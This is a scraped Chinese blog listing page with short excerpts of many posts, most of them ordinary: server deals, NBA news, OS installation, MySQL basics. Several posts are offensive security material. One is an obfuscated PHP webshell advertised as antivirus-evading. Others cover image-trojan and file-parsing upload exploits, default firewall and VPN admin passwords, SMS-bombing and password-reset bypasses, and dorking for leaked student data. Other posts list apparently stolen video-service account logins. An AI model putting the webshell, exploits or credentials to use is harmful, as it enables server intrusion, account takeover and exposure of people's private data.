• HDD和SSD的区别有哪些?HDD和SSD的区别有哪些?
  • Github打不开无法访问怎么办?如何解决?Github打不开无法访问怎么办?如何解决?
  • 等了10年,工信部的APP备案终于来了等了10年,工信部的APP备案终于来了

今日发布0 篇文章 | 本站共发布了2176篇文章
  • 68元买1年服务器

    选择那个68元一年的服务器 活动地址:http://uee.me/cAfQy 版权免责声明1、本网站名称:Kirin博客 2、本站永久网址:www.dufengvip.cn 3、本网站的资源部分来源于网络,如有侵权,请联系站长进行删除处理。 4、会员发帖仅代表会员个人观点,并不代表本站赞同其观点和对其真实性负责。 5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报。 ...

    2019-11-12 607
  • NBA球迷之夜取消

    据新浪NBA今天消息,在多方宣布暂停转播NBA赛事,NBA一天内损失十余家合作商之后,NBA总裁亚当·肖华(Adam Silver)已经连夜抵达上海。 然而,今天下午,上海体育总会发通告:2019NBA球迷之夜活动取消。 此外,原定于今天下午4:30在上海浦东丽思卡尔顿酒店举行的篮网队和湖人队赛前新闻发布会也已经取消,现场聚集了许多媒体,还有些球迷守在门口,希望看到自己喜欢的球星。同时,酒店对面的大幅比赛广告正在拆除。而且,昨天晚些时候,NBA中国赛上海站的路灯宣传牌已经作业拆除。 此前,肖华在日本东京召开的记者会上称,央视暂停NBA转播令人遗憾。 这是他第二次就此事公开发表回应,但是,仍未道歉。 他还提到,他已经和中国篮协主席姚明“直接沟通”,姚明目前“非常难过”,而且“十分生气”,但他希望能与姚明“最终和解”。 对于中央广播电视总台体育频道决定立即暂停NBA季前赛(中国赛)的转播安排,肖华回应称:“我知道CCTV发声明说,因为我支持莫雷的表达行为,哪怕不是他的观点本身,就决定禁播。我们没想到会这样,这很不幸,但这样的后果,我们只能承受。” 肖华说,自己对这件触怒数百万粉丝的事件“十分遗憾”,因为其本意是通过篮球来兜售梦想和希望(sell dreams, sell hopes)……但结果在人群中制造了失望和不和谐,这是让他遗憾的。 肖华表示,自己只是对(莫雷)那番言论造成的结果心怀歉意,但这与支持莫雷的言论自由并不矛盾。 肖华可能没有确切评估到事件的影响。在微博上,许多网友表达了自己的不满:许多网友举出快船队老板斯特林的例子,讽刺肖华在“言论自由”上的双重标准。 2014年,NBA总裁肖华宣布了对快船队老板唐纳德·斯特林种族歧视言论的调查结果,对其处以终身禁赛以及250万美元的罚款。有生之年,斯特林将永远不得进入NBA的球馆与训练场地。最终,斯特林被迫卖掉了快船队。 而快船队主帅也对此事作出回应,据新浪NBA今天消息,道格·里弗斯表示:我告诉过他们,言论自由并不意味着后果自由,就像你可以有言论自由,但是你所说的话可能会产生相应的后果。 央视快评:不要故意混淆国家主权和言论自由 今天,央视发表评论指出,“肖华们”将“言论自由”作为挡箭牌,是有意曲解概念混淆视听。所谓言论自由从来就不是绝对的,任何挑战国家主权和社会稳定的言论,都不属于言论自由的范畴,肖华和莫雷的狡辩只能说明他们的别有用心和傲慢无礼。 评论还指出,肖华在“言论自由”上还大搞价值观的双标。涉及到中国主权问题,肖华却一再以“言论自由”为幌子为莫雷百般辩解,拒不道歉,让人不得不怀疑此人的人品。再次提醒“肖华们”,在国家主权问题上,中国人民从来就不会有丝毫含糊,更不会有任何退让。今天的中国决不会吃你两面三刀那一套! ...

    2019-10-09 802
  • 系统安装方法之:PE安装

    (这个安装教程适用于所有的定制系统,uefi+gpt用户记得看文章末尾哦) 你需要准备的东西有: U盘(如果你有的话)、微PE的安装包、还有一个系统镜像 顺带附上微PE的官:www.wepe.com.cn(下载v2.0的) 这里有人会问: Q : 我用大菠萝PE装行嘛 或者 Q:为什么不用xiexinhua PE啊 A:也可以用别的PE装,但是很有可能会给你装一些垃圾软件或者怼点驱动上去,我用微pe的话……是因为这个比较纯净 好了接下来开始正片 下载好微PE的安装包之后,插上U盘(记得备份好文件哦),然后打开安装保 然后按照下图设置(橙色框住的是可以自行修改的选项)修改好以后,点击“安装进U盘”,待安装完成之后,重启,然后通过下列快捷键进入主板的快捷启动菜单uefi+gpt用户需要选择带uefi的启动项,例UEFI:Xieston(U盘名字),bios+mbr用户则反之,选中之后按Enter,然后请耐心等待,稍后会进到PE,进入下一阶段的安装 ps:如果您下载的镜像是iso结尾的,请看第一部分,gho结尾的,请看第二部分 第一部分———iso镜像篇 首先打开Dism++,就是图中的这个软件点击“接受” 即可进入主界面 然后再资源管理器中找到你下载的镜像(这里以原版镜像为例),双击挂载挂载好以后是下图这个样子然后回到Dism++,点击顶部的“恢复功能——-系统还原” 再点击“浏览” 然后按照这个目录找到install.wim之后,选择你要安装到的磁盘(这里默认是C盘,所以不用改动,上面的目标映像也不用改动)记得把添加引导和格式化勾选上哦,之后点击确。 直接点确定 请耐心等待,无聊的话,可以肝一会崩3,或者在群里迫害一下老♂黑 之后等待进度条走完,就可以关机拔掉U盘,然后再开机,就可以进入系统了 第二部分———–gho镜像篇 打开“ CGI备份还原 ”(就下图这个)先选择你要安装系统到哪个分区,然后选择gho镜像,再点击执行 点击确定耐心等待~~这可能需要一点时间,在此之前可以迫害一下老♂黑 PS:安装完成之后bios+mbr用户可以直接重启电脑进行下一阶段,而uefi+gpt用户需要通过Dism++修复引导后才能重启进行下一阶段的安装 (以下为针对uefi+gpt用户的引导修复教程) 打开Dism++,点击顶部的恢复功能,选择引导修复,点击确定,待修复完成之后,就可以重启电脑进行下一阶段的安装了。 ————————————————–End———————————————————— ...

    2019-10-06 621
  • 劲爆福利:京东云新用户撸1年服务器(2H8G1M)

    讲道理,这个可以说是非常非常劲爆的福利了,2核8G这配置的机器一年都得几百块何况还不是小牌子,看来刘强东老板想抢占市场有着很大的决心啊,那我们就不要客气了,这种活动,错过可是会后悔的哟! 0元撸1年2H8G1M云服务器,实名认证即可,还是新用户的上车! PS:每日配额有限,今天实测已经没了,建议每天10点准点去抢 活动时间:2019.9.10~12.31 活动地址:https://www.jdcloud.com/cn/activity/zerobuy ...

    2019-10-05 773
  • 图片木马

    利用图片和木马代码生成一个带木马的图片之后上传目标主机上之后,必须要以对应语言的方式执行木马才能上木马上线,只是打开图片链接是没有用的。 所以 图片木马执行的前提是目标主机有 相应的执行漏洞才行。 利用解析漏洞 一、IIS 5.x/6.0解析漏洞 IIS 6.0解析利用方法有两种 1.目录解析 /xx.asp/xx.jpg 2.文件解析 wooyun.asp;.jpg 第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。 例如创建目录 wooyun.asp,那么 /wooyun.asp/1.jpg 将被当作asp文件来执行。假设黑阔可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿shell了。 第二种,在IIS6.0下,分号后面的不被解析,也就是说 wooyun.asp;.jpg 会被服务器看成是wooyun.asp还有IIS6.0 默认的可执行文件除了asp还包含这三种 /wooyun.asa /wooyun.cer /wooyun.cdx 二、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞 Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的… 在默认Fast-CGI开启状况下,黑阔上传一个名字为wooyun.jpg,内容为 ');?> 的文件,然后访问wooyun.jpg/.php,在这个目录下就会生成一句话木马 shell.php 三、Nginx <8.03 空字节代码执行漏洞 影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37 Nginx在图片中嵌入PHP代码然后通过访问 xxx.jpg%00.php 来执行其中的代码 四、Apache解析漏洞 Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断. 比如 wooyun.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php. 如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个wooyun.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀 五、其他 在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点,黑客可以通过抓包,在文件名后加一个空格或者点绕过黑名单.若上传成功,空格和点都会被windows自动消除,这样也可以getshell。 如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入: SetHandler application/x-httpd-php 然后再上传shell.jpg的木马, 这样shell.jpg就可解析为php文件。 ...

    2019-10-04 928
  • 后台登陆页面的渗透思路

    万能密码/弱口令 先拿'or'='or'试一下,再试一下弱口令 遇到网络设备,基本像交换机、路由器、安全设备之类的,可以尝试一下默认密码 天融信防火墙,不需要证书 登录地址:https://192.168.1.254 用户名:superman 密码:talent 技术支持热线:8008105119 天融信防火墙,不需要证书 登录地址:https://192.168.1.254:8080 用户名:superman 密码:talent!23 遇到设备需要把旧设备配置备份下来,再倒入新设备基于console口登陆,用户名,密码跟web界面一致 system config reset 清除配置 save 保存 联想网御防火墙,需要证书(最好用IE浏览器登录) 登录地址:https://10.1.5.254:8889 用户名:admin 密码:leadsec@7766、administrator、bane@7766 技术支持热线:4008107766 010-56632666深信服防火墙(注安全设备管理地址不是唯一的) https://10.251.251.251https://10.254.254.254 用户名:admin 密码:admin 技术支持热线:4006306430 启明星辰 https://10.1.5.254:8889 用户名:admin 密码:bane@7766https://10.50.10.45:8889 用户名:admin 密码:admin@123 电脑端IP:10.50.10.44/255.255.255.0 技术支持热线:4006243900 juniper 登录地址:https://192.168.1.1 用户名:netscreen 密码:netscreen Cisco 登录地址:https://192.168.0.1 用户名:admin 密码:cisco Huawei 登录地址:http://192.168.0.1 用户名:admin 密码:Admin@123 H3C 登录地址:http://192.168.0.1 用户名:admin 密码:admin 技术支持热线:4006306430 绿盟IPS https://192.168.1.101 用户名: weboper 密码: weboper 配置重启生效网神防火墙GE1口 https://10.50.10.45 用户名:admin 密码:firewall 技术支持热线:4006108220 深信服VPN: 51111端口 delanrecover 华为VPN:账号:root 密码:mduadmin 华为防火墙: admin Admin@123 eudemon eudemon Juniper防火墙: netscreen netscreen 迪普 192.168.0.1 默认的用户名和密码(admin/admin_default) 山石 192.168.1.1 默认的管理账号为hillstone,密码为hillstone 安恒的明御防火墙 admin/adminadmin 某堡垒机 shterm/shterm 天融信的vpn test/123456 使用burp弱口令爆破 使用Burp里的Intruder功能进行爆破,如何使用请看:如何使用FOFA挖到弱口令漏洞 扫目录 目录扫描也是一个存在惊喜的地方,说不定能扫描到后台未授权访问的链接、备份文件、编辑器、敏感信息等。 像后台登陆的网址看多了,常规的路径像www.xxx.com/admin/login.aspx(.php)老司机甚至不用御剑什么的工具跑,就能直接猜到。 一般碰到下面这种情况,可采用fuzz大法。一层一层fuzz,尝试寻找可利用的信息。 框架漏洞 1. 对一些CMS,已经比较成熟了,漏洞确实不好挖。如果网上(乌云,seebug,搜索引擎等)的历史漏洞没有复现成功,那一般情况下就只能寻找下逻辑漏洞、网站管理员配置错误或者弱口令什么的。 2. 对于一些不知名的框架,一般也可通过登陆界面底下的声明中找到开发公司和产品版本时间。 3. 在网上找找此公司产品是否爆出过漏洞。若是开源的框架,还可下载源码进行代码审计寻找漏洞。像java的站,登陆页面是.do或.action的网址。可尝试下 struts2 命令执行漏洞。 4. 又如thinkphp的CMS,可尝试下是否存在相应版本的命令执行漏洞。 逻辑漏洞 任意用户注册 注册用户不需验证码认证即可注册成功的情况下,可使用工具发包,恶意批量注册用户。 修改发送包邮箱尝试覆盖注册 1. 注册时显示某用户已注册; 2. 在注册新用户时抓包,更改自己的账号信息为admin用户; 3. 可能可以覆盖admin用户,重新注册成功。 任意密码重置 修改密码时使用其他人的手机号,可抓包更改成自己的手机号。自己手机收到验证信息并输入,可更改他人密码成功。 跳过验证 跳过验证步骤、找回方式,直接到设置新密码页面 短信轰炸 短信轰炸,一般人可能抓包重放失败后就放弃了。这里有个技巧 发送短信处一般每隔60秒才能发送一次 但若是发包时在手机号后加上一个空格、加号或换行符等特殊字符。然后重新发送,这时若发送成功,则说明可绕过限制。 此时在intruder模块只要持续递增空格就可造成无限短信轰炸 越权 越权访问目录 可越权访问到后台路径,网站组件配置文件,备份文件等,当然扫目录字典也要好。 修改身份标识 更改成功登陆的用户的身份标识,可能就能越权访问到其他用户的页面。 抓返回包 在登陆时返回包可能返回用户敏感信息,此时改一改参数说不定还能越权查到其他用户信息。 或注册、找回密码发送短信邮箱时,可能直接返回验证码等 在返回包里,更改下参数为true、success、1,可能就能未授权进入后台 看网站源码信息 当你思路枯竭的时候不妨看看源码,它是一块宝藏,说不定就能在里面发现惊喜。有些程序员会把后台的功能链接放在前端源码中,说不定就存在未授权访问,甚至有些奇葩程序员在前端代码存放测试的账号密码。 声明: 作者的初衷是分享与普及网络安全知识,若读者因此做出任何违法行为,后果自负,与原作者无关。 ...

    2019-10-04 1185
  • 在线生成自己的军装照片

    当兵后悔两年,不当兵后悔一辈子。 没有穿上军装体验到军营生活成了一种遗憾, 生成一张军装照减少一丝遗憾吧 地址:https://ih101.weishi.qq.com/main.html ...

    2019-10-04 750
  • 如何挖掘高校信息泄露漏洞?

    先看看我的"战绩"一)信息泄露漏洞的定义: 敏感数据包括但不限于:口令、密钥、证书、会话标识、License、隐私数据(如短消息的内容)、授权凭据、个人数据(如姓名、住址、电话等)等,在程序文件、配置文件、日志文件、备份文件及数据库中都有可能包含敏感数据。 高校的信息泄露漏洞,是普遍存在的,而且比较严重,我接触到,低危的是身份证泄露,手机号泄露;高危的有密级是秘密的,管理员账号密码的。 我个人猜测漏洞存在的原因: 一般老师互传是有渠道的,老师与学生互传才没有渠道,因此需要借助站点,例如发公众号,推文。 为什么不用内网?因为大多数人用手机看。 二)如何操作? 1.使用Google Hacking Google Hacking语法是个神器,我把他比喻成一把神剑,能斩到什么,就看你怎么用。 site:edu.cn 搜索所有主域名是edu.cn的链接 filetype:xls 搜索所有文件后缀是xls的链接 懂了一些没有?你还可以给他添加你想要的条件 site:edu.cn filetype:xls 手机号 (三个条件:搜索所有主域名是edu.cn的链接,并且文件后缀是xls的,也就是xls文件,并且搜索xls文件内容带有手机号的链接。) 我已经把思路教给你们了,至于怎么深入利用,还得自己移驾到百度搜索:Google Hacking语法 如果有看不懂这盘文章的,请你逐字逐句把第二步慢慢读一遍。 三)闻道 道阻且长,没有特殊的机缘,知道也只是知道,许多人到死都不会明白一切是怎么回事。 声明: 作者的初衷是分享与普及网络安全知识,若读者因此做出任何违法行为,后果自负,与原作者无关。 ...

    2019-10-04 1272
  • 腾讯视频会员账号共享

    我们保证每天分享的帐号都是真实并且可以登录的,成功登录帐号的请不要随意更改密码,将方便留给大家。 账号:17315692 密码:gfWIDmL4yQgi 账号:648156921 密码:Z7rTFk 账号:6591569211 密码:EgWqGim 账号:3231569205 密码:wV5T9Rl6b 账号:55015692 密码:OBl1Ad13FgW 账号:1581569202 密码:Dq02SCOhuLctyIr 账号:23715692086 密码:gcgNIDnaD 账号:32615692 密码:oxzHuYZLJ 账号:94815692 密码:KhPahr4VIBX 账号:91156920624 密码:buRXiHZe9tRQ 账号:316156921191 密码:wTsV72dDBVg 账号:2851569204841 密码:kedekciUrnm2H ...

    2019-10-04 714
  • 迅雷超级白金账号分享

    我们保证分享的帐号都是真实并且可以登录的,成功登录帐号的请不要随意更改密码,将方便留给大家。 账号:5601569031 密码:bTL9dtqII 账号:762156903 密码:iAkzleAmCajw 账号:651156903 密码:znwTSzwGZO8N3 账号:2971569037735 密码:7mG1NUF4EFcxJbd 账号:61615690354 密码:FSxXgx2qfPg4 账号:1671569037 密码:NHrZPc 账号:675156904 密码:DlNq3IBdqGPrZr 账号:941569034208 密码:TgxVEr8mqD3 账号:3491569033377 密码:kSAXFd 账号:884156903334 密码:1vqng5Ps2y 账号:992156904 密码:O80zDXnJ 账号:580156903 密码:90Uzxq7 账号:520156903969 密码:gBLIzP0gXEY 账号:40115690332 密码:FUBErBKxGId0kA4 温馨提示:给大家分享这么多账号,也希望大家能够向你的朋友分享本站,浏览器搜索【kirin博客】即可访问本站 ...

    2019-10-04 770
  • 爱奇艺会员账号分享

     我们保证分享的帐号都是真实并且可以登录的,成功登录帐号的请不要随意更改密码,将方便留给大家。 账号:1021569037 密码:p4wE9VnFp4gx 账号:1321569038 密码:R9583wHEYnWAPFG 账号:668156903 密码:rYibpWqrQS 账号:9111569040 密码:ivjCJRG 账号:4391569033998 密码:1BFcSbAhR9 账号:30515690418 密码:2D8fVJMmQRP2 账号:827156903 密码:rjITvmLa 账号:49515690361 密码:L8zxcuK7mO 账号:71915690 密码:wi7Idj4tw3TnF 温馨提示:给大家分享这么多账号,也希望大家能够向你的朋友分享本站,浏览器搜索【Kirin博客】 ...

    2019-09-14 669
  • mysql的基本用法

    安装 rpm安装 yum install -y mysql-server mysql-devel 启动服务 1.service mysqld start #启动服务 2.service mysqld stop #关闭服务 3.service mysqld restart #重启服务 4.chkconfig mysqld on #设置开机启动 常用操作 mysql客户端命令 mysql -u #用户名 -p #密码 -h #主机 -p #协议(根据tcp, socket, pile等) 更改用户密码 mysqladmin实现 1.mysqladmin -uroot password 'newpassword' -p 或 2.mysqladmin -u root -h hostname password 'newpassword' 修改数据库实现 1. mysql>use mysql; mysql>update user set password = password('newpassword') where user = 'root'; mysql>flush privileges; 2. mysql>set password for 'root@host_name' = password('newpassword'); mysql>update mysql.user set password = password('newpassword') where condition; mysql>flush privileges; 服务端常用命令 交互模式(通过mysql -uroot -p进入) mysql>show databases; #列出所有数据库 mysql>shwo tables; #查看所有表 mysql>show engines; #查看引擎信息 mysql>show character set; #查看字符集 mysql>use DB_NAME; #切换当前数据库 查看数据库当前有访问权限的信息 mysql>use mysql; mysql>select User, Password, Host FROM user; 允许用户远程登陆 mysql>use mysql; mysql>GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root' WITH GRANT OPTION; mysql>flush privileges; #其中"*.*"代表所有资源所有权限, “'root'@%”其中root代表账户名,%代表所有的访问地址, #也可以使用一个唯一的地址进行替换,只有一个地址能够访问。如果是某个网段的可以使用地址 #与%结合的方式,如10.0.42.%。IDENTIFIED BY 'root',这个root是指访问密码。WITH GRANT OPTION允许级联授权。 删除历史输入的命令 root@localhost# head ~/.mysql_history root@localhost# >~/.mysql_history 批处理模式(用于将表导入数据库) mysql < *.sql 数据库的备份 root@localhost# mysqldump -uroot -p password [DB_NAME] > [DUMP_FILE] #备份指定数据库 root@localhost# mysqldump --no-data --databases mydatabases1 mydatabases2 mydatabases3 > test.dump #只备份表结构 root@localhost# mysqldump --all-databases > [DUMP_FILE] #备份所有数据库 忘记root密码 #跳过访问控制权限进入mysql #编辑 /etc/my.cnf,添加一行:skip-grant-table [mysqld] skip-frant-table #重启mysqld service mysqld restart #修改密码 root@localhost# mysql mysql>use mysql mysql>update mysql.user set password = password('newpassword') where user = 'root' and host = 'localhost'; mysql>flush privileges; mysql>exit #编辑/etc/my.cnf文件 删除skip-grant-table #重启服务 service mysqld restart 创建用户 #登陆mysql mysql -uroot -p密码 #创建用户 mysql> insert into mysql.user(Host,User,Password) values("localhost","test",password("1234")); #创建了一个test用户 密码为1234 且只能本地登陆如果要远程登陆把"localhost"改为"%"。 mysql>flush privileges; 删除用户 #登陆mysql mysql -uroot -p密码 #删除用户 mysql>Delete FROM user Where User='test' and Host='localhost'; mysql>flush privileges; mysql>drop database testDB; #删除用户的数据库 #删除账户及权限 mysql>drop user 用户名@'%'; mysql>drop user 用户名@ localhost; 删除数据库和数据表 mysql>drop database 数据库名; mysql>drop table 数据表名; 导入导出.sql文件的方法 #导出数据和表结构: mysqldump -u用户名 -p密码 数据库名 > 数据库名.sql root@localhost# mysqldump -uroot -p abc > abc.sql #只导出表结构 mysqldump -u用户名 -p密码 -d 数据库名 > 数据库名.sql root@localhost# mysqldump -uroot -p -d abc > abc.sql #导入数据库 1.建立空数据库 mysql>create database abc; 2.导入数据库 1).选择数据库 mysql>use abc; 2).设置数据库编码 mysql>set names utf8; 3).导入数据库(注意sql文件路径) mysql>source /root/abc.sql...

    2019-09-13 627
  • Win10任务管理器监控系统在桌面上显示

    让Win10实时监控任务管理器在桌面上面显示或置顶在最前面让你时时刻刻了解你的电脑资源占用率,还可以在玩游戏时测测是否资源率占用大,还有各种姿势使用,自己折腾吧。 打开任务管理器,键盘快捷键:CTRL+SHIFT+ESC,默认显示是下图一样的打开性能然后双击CPU那里。 双击就变成这种简洁窗口了,再次双击就还原,其它功能自己尝试吧! ...

    2019-09-13 949
  • 最新webshell免杀php一句话变种

    前言       2019年9月9日最新免杀php变种一句话,亲测过啊D,不知道什么时候加入特征库报毒,反正现在能用吧。 <?php class VMTX{ function __destruct(){ $BRLI='f$vjcT'^"\x7\x57\x5\xf\x11\x20"; return @$BRLI("$this->EKDL"); } } $vmtx=new VMTX(); @$vmtx->EKDL=isset($_GET['id'])?base64_decode($_POST['mr6']):$_POST['mr6']; ?> 说明 http://www.xxx.com/shell.php POST: mr6=phpinfo(); //与普通shell相同 http://www.xxx.com/shell.php?id=xxx(xxxx随便修改) POST: mr6=cGhwaW5mbygpOwo= //payload的base64编码...

    2019-09-13 1230
  • PHP腾讯域名拦截检测接口源码

    <?php header('Access-Control-Allow-Origin:*'); header('Content-type:application/json; charset=utf-8'); error_reporting(0); !empty($_GET['url']) ? $url = $_GET['url'] : exit(json_encode([ 'code'=>-1, "msg"=>"请输入网址" ],JSON_UNESCAPED_UNICODE)); $json = jsonp_decode(Curl_GET("https://cgi.urlsec.qq.com/index.php?m=check&a=check&callback=jQuery11.306943167371763181_15671.3944271&url={$url}&_=".msectime())); if ($json->reCode!==0){ $arr=[ "code"=>-1, "msg"=>$json->data, ]; }else{ $type = $json->data->results->whitetype; $urls = $json->data->results->url; if ($type==1 || $type==3){ $arr=[ "code"=>1, "msg"=>"检测成功", "url"=>$urls, "type"=>"正常" ]; }else{ $arr=[ "code"=>1, "msg"=>"检测成功", "url"=>$urls, "type"=>"拦截" ]; } } exit(json_encode($arr,JSON_UNESCAPED_UNICODE)); /** * @return string * Curl GET */ function Curl_GET($url){ $ch = curl_init(); // Curl 初始化 $header = [ 'X-FORWARDED-FOR:218.91.92.84', 'CLIENT-IP:218.91.92.84', 'Cookie: pgv_pvi=9897416704; RK=WI7w5+CMZn; ptcz=e383433090496e1f60381fd68733196426868ba1876249a6736bcc4a3eb8ec72; pgv_pvid=455855220; cid=89410138-a33a-4ea9-98f2-4436da89d67d; _tfpdata=yBRknXvS8CfrED0zD85NZfxCPzT5SW8KEY03rIziZmu9ogk9y%2B5%2FU4QrJBbfqfuVqr%2F6vw8nSWfqHR3fu2Jc0TPvszwmrMwXEdN%2B8bKKfHwNCcL%2F2%2Fbhmiu%2B%2F4IgK1DX' ]; curl_setopt($ch, CURLOPT_URL, $url); // 设置 Curl 目标 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // Curl 请求有返回的值 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); // 设置抓取超时时间 curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // 跟踪重定向 curl_setopt($ch, CURLOPT_ENCODING, ""); // 设置编码 curl_setopt($ch, CURLOPT_REFERER, $url); // 伪造来源网址 curl_setopt($ch, CURLOPT_HTTPHEADER, $header); //伪造IP curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"); // 伪造ua curl_setopt($ch, CURLOPT_ENCODING, 'gzip'); // 取消gzip压缩 curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); // https请求 不验证证书和hosts curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); $content = curl_exec($ch); curl_close($ch); // 结束 Curl return $content; // 函数返回内容 } /** * 返回当前毫秒 */ function msectime() { list($msec, $sec) = explode(' ', microtime()); return (float)sprintf('%.0f', (floatval($msec) + floatval($sec)) * 1000); } /** * @param $jsonp * @param bool $assoc * @return mixed * jsonp转对象 */ function jsonp_decode($jsonp, $assoc = false) { $jsonp = trim($jsonp); if(isset($jsonp[0]) && $jsonp[0] !== '[' && $jsonp[0] !== '{') { $begin = strpos($jsonp, '('); if(false !== $begin) { $end = strrpos($jsonp, ')'); if(false !== $end) { $jsonp = substr($jsonp, $begin + 1, $end - $begin - 1); } } } return json_decode($jsonp, $assoc); } ...

    2019-09-13 1201
  • PHP自动Get监控源码分享

    程序简介 创建个PHP文件放到你的网站根目录里面,访问后不会出现结果,等待个20秒左右关闭页面,就会自动执行了。 如果不重启php服务器 或者重启服务器,get监控一直会处于运行状态。 测试了一下秒赞网的监控,效果还是很不错的。 程序代码 <?php //设置脚本运行不超时 set_time_limit(0); //即使浏览器关闭还继续运营 ignore_user_abort(true); //睡眠5秒 sleep(5); //要监控的网址 $cronurl = 'https://www.baidu.com/'; //开始get监控 httpGet($cronurl); //这里还可以无限添加httpGet("网址"); //获取当前文件的访问url $url="http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; //开始get运行,达到无限循环的效果 httpGet($url); //发起GET模拟请求 function httpGet($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER,array('Accept-Encoding: gzip, deflate')); curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate'); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4"); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 3); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); $output = curl_exec($ch); curl_close($ch); return $output; } ...

    2019-09-13 736
  • 拥有一副好身材是怎样的体验?

    知乎上关于身材好的讨论层出不穷,备好营养快线在看 拥有一副令人羡慕的好身材是怎样的体验? 地址:https://www.zhihu.com/question/297715922/answer/730392675 身材丰满型的女生穿旗袍不好看吗? 地址:https://www.zhihu.com/question/293990901/answer/728222816 有个身材火辣的女朋友是怎样一种体验? 地址:https://www.zhihu.com/question/313825759/answer/633963251 女生拥有一双大长腿是什么样体验? 地址:https://www.zhihu.com/question/266669308/answer/386636616 为啥现在腿控那么多? 地址:https://www.zhihu.com/question/305040147/answer/575079312 ...

    2019-09-06 577
  • QQ扩列宣言女生可爱撩人签名 我这个该死的漂亮女孩

    导读:你骂我,我吃亏,你就是个小乌龟今天要完成的任务是,想你,爱你,夸你。抬头要挺胸,走路要带风。我这个该死的漂亮女孩。你的眼睛真漂亮里面只适合装我你过来我有个天想跟你聊一下算命的说我旺夫你要不要验证一下说 你骂我,我吃亏,你就是个小乌龟 今天要完成的任务是,想你,爱你,夸你。 抬头要挺胸,走路要带风。 我这个该死的漂亮女孩。 你的眼睛真漂亮里面只适合装我 你过来 我有个天想跟你聊一下 算命的说我旺夫你要不要验证一下 说了晚安就不准再和别的小朋友聊天了哦。 猪圈空荡荡,而你在人间。 抱着小熊一天天长大 糖果也一天天甜. 都怪这个世界上女孩子太多了 我都不宝贝了 你好,我叫对象,真名老婆,小名女神,外号宝贝,喜欢哪个就叫我哪个。 女生污起来,男生用十个闪现都追不上。 我妈说等我长大了,就把我嫁给你。 你现在在哪儿 在家 你现在在我的脑海里 你知道我喜欢什么季节吗 不知道 我喜欢有你的季节 染最艳的头发 留最深的疤 只为寻找最爱的她 我想你一定很忙,所以你只看前三个字就好。 想打你一顿,也想抱抱你,想问你怎么还不来找我,我难过的都要发芽了。 遇见这么可爱的我,难道不是这世间最好的礼物吗? 我有一点点甜 一点点可爱 还有很多很多喜欢你. 没时间跟你斤斤计较,我还要忙着可爱。 希望你以后,有酒有肉有姑娘,姑娘丑的不像样。 我曾经是少女 现在是美少女. 世间的五味俱全 只想要一个人给的甜. 冬天啊 女孩子白白嫩嫩的手就应该放在喜欢的人口袋里. 见什么世面 见见你就好啦 小鱼干是我的 你也是我的 要记住每一个对你好的人,因为他们本可以不这么做的。 都说爱笑的人智商高那我岂不是智商爆表了. 你是个好男孩,可是我太漂亮了,你配不上。 现在的我很自在,皆因没有恋爱。 别拍了,我就是这儿最沙最甜的西瓜。 小时候被不吐西瓜子吓的半死的,长大就知道自己多蠢了吧。 ...

    2019-08-29 688
  • 腾讯BUG免费换挂件

    无需开通会员点击即可直接设置挂件 已亲测! 地址:http://t.cn/Ai83eWSH...

    2019-08-29 633
  • 王者荣耀体验服

    王者荣耀体验服最新一期资格申请活动 开放时间8月27日15点开启抢号功能! 地址:http://t.cn/Ai8fLbQI...

    2019-08-27 950

友情链接 百度收录正常的正规站可申请友情链接! 申请友链

联系我们

在线咨询:点击这里给我发消息

QQ交流群:KirinBlog

工作日:9:00-23:00,节假日休息

扫码关注